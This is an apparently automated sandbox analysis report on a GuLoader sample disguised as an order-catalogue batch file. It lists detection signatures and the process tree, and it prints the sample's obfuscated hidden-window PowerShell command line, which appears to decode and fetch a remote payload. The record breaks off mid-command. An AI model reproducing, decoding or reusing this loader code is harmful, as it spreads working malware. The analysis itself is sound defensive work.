Edit tour
Windows
Analysis Report
ORDER AND CATALOG 01.bat
Overview
General Information
Detection
GuLoader
Score: | 60 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Yara detected GuLoader
Suspicious powershell command line found
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Classification
- System is w10x64_ra
- cmd.exe (PID: 6432 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\User s\user\Des ktop\ORDER AND CATAL OG 01.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 5232 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 6852 cmdline:
powershell .exe -wind owstyle hi dden ";$Pu kka='Drill evorn';;$A dditionste gnenes='Dr ftede165'; ;$Neri='Th ebain';;$A steroidens ='Outsling ';;$Daarsk ab='Calamo pitys';;$g astons=$ho st.Name;fu nction Gal skaber65($ Pareticall y){If ($ga stons) {$C hemiuserza tion191=5} for ($Thi nkings=$Ch emiuserzat ion191;;$T hinkings+= 6){if(!$Pa retically[ $Thinkings ]) { break }$Kondens eringerne+ =$Paretica lly[$Think ings]}$Kon denseringe rne}functi on bearbej deligste($ Fagidioter nes){ .($M edunderskr iv) ($Fagi dioternes) }$Succinct ory46=Gals kaber65 'R estinMedit eIngm.tM.t ho. Drifwe lskoe hjem bTelefCirr eclbowleiL asereAncyl nSaurut';$ hjulpisker e=Galskabe r65 'Inde, M Gardo s adzEkspriS trumlStr.p lSliksaStr el/';$Wigg as=Galskab er65 'Elbi lT,ontrlRy gdksTrlso1 Arn s2';$h usholderis k='Egne [I nvirNSu pl E Pr gTTeg o.HjspnSB irdleSkg,r RTilgivDia paI GawgCF or iEGrsho PFr boO ia rii Fo onl ang tUdsyr mLivsfaCha rtNBajonaP o.ygginoff eDo.inrEle kt]Hydr :U dnyt: Tids SSk riev n fuCCnemiU K ncrUni.e i.uesttAut opySkrifpS ge rr spha O esudtOms kiOkonstcS hrieoUnspe lRe da= Ar me$Udpumws trewI A.nd GTeknoGSta l aBu.keS' ;$hjulpisk ere+=Galsk aber65 'S bar5Forpl. Ligus0Rhap o Ganga( k ultW Unw i Vinstngnet adRebutoPe ctowM zzls Marke H,em mNEkspoT y sse mana1C erva0H eml .Overc0Aft wa;Pre t F rivoWtruss i Pl mn ac if6 Ni h4D igre; Pela AvocaxL f tn6 Sa.o4M esot;Blaat F gtnr D, sqv .ont:T rolo1Monoc 3Revei1 sp c. Or m0H yper) Jaev ReverGV n dierappocF unktkGrutn o Rest/ Ma rc2dowha0B ivaa1Fod n 0Pili.0Tiv ol1Redif0 Berb1Hypos Pa aF E,o ti ultrGen ite ForsfV aluto Inju x red/ Uti l1Krkli3 F rey1Sa.di. Afgr 0';$V ampirish=G alskaber65 ' PsycU B lacsTegneE NatteR op. a-MisemaF lklGSkrmbe PharyNRode nT';$Stokk en=Galskab er65 'Elek th SandtNe f,nt Subvp DigisHaem a:Holda/ o rbi/ kovsc AnsvoUsk. dhUnbuyaTi ff bHype i MessatM on laBefaliRe sepsanden. SilkerHave euKolle.St ttec Untio SiphomTect o/H ghvc,o rsts Hveds Schin- eko s/degerOMe rckvServee Banker For ls lfooP e seeHovediF aeposBe.ra kEc.oceMal ed.Preo aU dskrskvaba d Si s>Dri fthOrkant Wh mtMalis pNonalsIma ms:Frem /M et i/Indve nUsel rTeg nk.FitchyR estiy Stra n ulkodCap rizg oseq Pa e2 Mulc . Nonis St uba Thed. iskcChucko Tot mmMicr o/Pictuc C olugBetwei Solid_Dili ,bCa diino ninnVrd.h/ Lnk rOPs,u dvNarc eNo ni r Ndris BankfoF.rr eeNonrhiU stys Lea k Videoe Ung e. nisaa m atrs Uns d ';$Dogwink le=Galskab er65 'Bivu a>';$Medun derskriv=G alskaber65 'udskrIPl ie,e,iskeX ';$Overspi lle='secco ';$Blossom s='\Suspen dibility.L um';bearbe jdeligste (Galskaber 65 'Sojas$ MisguGAl m nl DetaOMe t lBFlsena Brierl,ugn l: Empod d skiO hegug RustnMStop kaPsychtSt r kIFil iS ProceMIs n dEAnathrJa zzb= Rdle$